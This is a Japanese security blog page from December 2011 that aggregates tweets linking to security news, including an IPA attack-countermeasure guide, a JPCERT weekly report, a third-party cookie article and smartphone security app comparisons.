connect24h :情報処理推進機構:プレス発表:記事:「『新しいタイプの攻撃』の対策に向けた設計・運用ガイド改訂2版」を公開 http://owl.li/7JkaN


jpcert :こんにちは。Weekly Report 2011-11-30を公開しました。^YK


ockeghem :Part2。やはり素晴らしい内容 / “サードパーティCookieの歴史と現状 Part2 Webアプリケーションにおける利用とその問題 - 最速転職研究会” http://htn.to/sZMssQ


CyberCrimeNEWS :Microsoft say hackers launch millions of Java exploits http://dlvr.it/yLCx1 #ccureit


yasulib :ASCII.jp:ウイルスの感染場所から理解する感染PCの復旧|週刊セキュリティレポート エフセキュアの富安さん


bubsnewscom :窓の杜、スマートフォンを守るセキュリティ対策アプリ8本を徹底比較 - http://tinyurl.com/78lxp8b

テーマ : セキュリティ
ジャンル : コンピュータ

プロフィール

bogus

Author:bogus
FC2ブログへようこそ!

最新記事
最新コメント
最新トラックバック
月別アーカイブ
カテゴリ
検索フォーム
RSSリンクの表示
リンク
ブロとも申請フォーム

この人とブロともになる

QRコード
QR
カレンダー
12-2011
SUN MON TUE WED THU FRI SAT
- - - - 1 2 3
4 5 6 7 8 9 10
11 12 13 14 15 16 17
18 19 20 21 22 23 24
25 26 27 28 29 30 31

11   01

上記広告は1ヶ月以上更新のないブログに表示されています。新しい記事を書くことで広告を消せます。